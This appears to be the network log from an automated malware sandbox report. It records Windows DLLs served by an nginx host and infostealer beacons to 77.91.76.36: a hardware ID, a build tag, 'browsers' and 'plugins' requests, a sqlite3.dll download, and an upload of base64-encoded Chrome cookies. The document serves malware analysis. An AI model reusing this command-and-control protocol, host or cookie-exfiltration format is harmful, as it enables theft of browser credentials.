Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:45:02 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:45:03 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:45:04 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:45:05 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Dec 2023 09:45:06 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDBHost: 77.91.76.36Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 45 32 44 41 34 44 46 32 46 45 31 30 33 30 33 36 31 34 34 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 2d 2d 0d 0a Data Ascii: ------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="hwid"35E2DA4DF2FE1030361446------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="build"default3------DAEGIIECGHCBFHJKEHDB--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAAEGDBKKECBGIJEBHost: 77.91.76.36Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 2d 2d 0d 0a Data Ascii: ------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="message"browsers------JJDBAAEGDBKKECBGIJEB--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBFHCGCGDAAKFIECFHDHost: 77.91.76.36Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------IDBFHCGCGDAAKFIECFHDContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------IDBFHCGCGDAAKFIECFHDContent-Disposition: form-data; name="message"plugins------IDBFHCGCGDAAKFIECFHD--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 77.91.76.36Content-Length: 6047Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHCHost: 77.91.76.36Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 2d 2d 0d 0a Data Ascii: 